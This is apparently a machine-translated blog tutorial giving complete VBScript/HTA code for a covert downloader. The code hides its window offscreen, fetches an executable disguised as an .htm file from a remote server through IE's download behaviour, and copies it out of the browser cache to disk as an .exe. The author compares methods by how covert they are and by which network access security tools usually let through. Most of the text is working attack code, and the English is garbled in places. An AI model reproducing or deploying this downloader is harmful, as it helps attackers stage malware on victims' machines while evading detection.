First, there are two newer VBS downloads on this blog, one is made with the Cdo.message component and the other is made with Microsoft.XMLDOM, see http://www.jb51.net/article/15506.htm. One of the two downloads is more cumbersome to use, you need to transform the EXE in advance. The second use of Cscript.exe will visit the network, not too covert. The second is that some machines do not exist on these two components and the use of adodb.stream, so there are some drawbacks.
Second, again the Lake2 download http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx. This is a good download, but there are also problems. One is that if you installed 360 other browsers, you will open an IE window, and read from the registry of IE cache location is not necessarily accurate.
third, how can we update these deficiencies? There is still a way. We use an HTA to write, this is relatively rare. The hh.exe access network is generally expected to be released. There are several things you can do to write this download:
(1). Make the HTA invisible-------------"simple, mobile window
(2). Enable HTA to receive command line parameters--------------"This blog has information
(3). Do not call all components of the top one or two items-----------"This is the default behavior that we use IE
(4). IE Cache temporary location---------"I use the environment variable
(5) We do not call any components-------------------"need manual
Iv. Code (write the parameters directly in the HTA)
Copy Code code as follows:
<script language=vbs>
Window.moveto 4000,4000
Window.resizeto 0,0 ' makes an HTA invisible
The Set objshell= CreateObject ("Wscript.Shell") ' HTA can call Wscript.Shell directly, but cannot invoke WScript.CreateObject ("Wscript.Shell")
Downpath=objshell. ExpandEnvironmentStrings ("%USERPROFILE%") & "\local Settings" ' Download path based on environment variables
Set xml=document.createelement ("xml") ' Build-side XML element invokes IE's default behavior
Xml.addbehavior ("#default #download")
Xml.async=0
Xml.load ("http://192.168.0.10/xx.htm") ' please put the name of the EXE into space, with the FTP software upload words, may not, the direct release is better
Showallfile (Downpath)
Sub Showallfile (Path) traversal lookup, directly using LAKE2 code
Findfilename= "Xx[1].htm" ' This is also you need to change, if above is xx.htm, this is xx[1].htm
Set FSO = CreateObject ("Scripting.FileSystemObject")
Set f = FSO. GetFolder (Path)
Set FC = F.subfolders
For each F1 in FC
If FSO. FileExists (path& "\" &f1.name& "\" &findfilename) Then
Fso. CopyFile path& "\" &f1.name& "\" &findfilename, "C:\111.exe" ' Save to C:\111.exe, can be changed as needed
' document.write ' [+]download Success!]
End If
Showallfile path& "\" &f1.name
Next
Set FSO = Nothing
End Sub
Window.close
</script>
Use is: The EXE like Xx.exe renamed into Space, and then the command line or double click on the HTA can be.
Five, another code (command line arguments)
I personally think that the fourth part of the code is better, to modify the use on it. If you call command-line arguments, I find that there will still be a small HTA window, which is closed after downloading, so it's not very good. Code:
Copy Code code as follows:
Id= "Mysamplehta"
caption= "Yes" >
<script language=vbs>
On Error Resume Next
Window.moveto 4000,4000
Window.resizeto 0,0 ' makes an HTA invisible
Cmdlinearray = Split (mysamplehta.commandline) ' This is to turn the arguments in the command into an array
Set objshell= CreateObject ("Wscript.Shell")
Downpath=objshell. ExpandEnvironmentStrings ("%USERPROFILE%") & "\local Settings" ' Download path based on environment variables
Temp=lastone (Cmdlinearray (UBound (Cmdlinearray)), "/" to get the current file name from the command line
Temp=split (Temp, ".") ' According to. Split
Findfilename=temp (0) & "[1]." &temp (1)
Localname=objshell. currentdirectory& "\" &temp (0) & ". exe"
Set xml=document.createelement ("XML")
Xml.addbehavior ("#default #download")
Xml.async=0
Xml.load (Cmdlinearray (UBound (Cmdlinearray))
Showallfile (Downpath)
Sub Showallfile (Path)
Set FSO = CreateObject ("Scripting.FileSystemObject")
Set f = FSO. GetFolder (Path)
Set FC = F.subfolders
For each F1 in FC
If FSO. FileExists (path& "\" &f1.name& "\" &findfilename) Then
Fso. CopyFile path& "\" &f1.name& "\" &findfilename, LocalName
' document.write ' [+]download Success!]
End If
Showallfile path& "\" &f1.name
Next
Set FSO = Nothing
End Sub
Function LaStone (STR,SPLITSTR)
' Enter characters and delimiters to get the last part
LaStone = Right (Str,len (STR)-instrrev (STR,SPLITSTR))
End Function
Window.close
</script>
Usage is: The EXE like Xx.exe renamed Xx.htm placed in space, and then command line like "C:\xx.hta http://www.target.com/xx.htm", so that Xx.exe will be saved to C:
Six, do not invoke any components (need to manually find downloaded xx[1].htm):
Copy Code code as follows:
Window.moveto 4000,4000
Window.resizeto 0,0 ' makes an HTA invisible
Set xml=document.createelement ("xml") ' Build-side XML element invokes IE's default behavior
Xml.addbehavior ("#default #download")
Xml.async=0
Xml.load ("http://192.168.0.10/xx.htm") '
Window.close
Vii. Shortcomings
My HTA downloader is not perfect. The first is because of the temporary variable that I've downloaded, I used the expandenvironmentstrings ("%USERPROFILE%"), which is available in the user's environment and may not be normal under system permissions (I guess, not tested). The second is because the success of the download did not prompt, directly with the HTA in the command line show a bit of trouble, so I did not do, hehe.
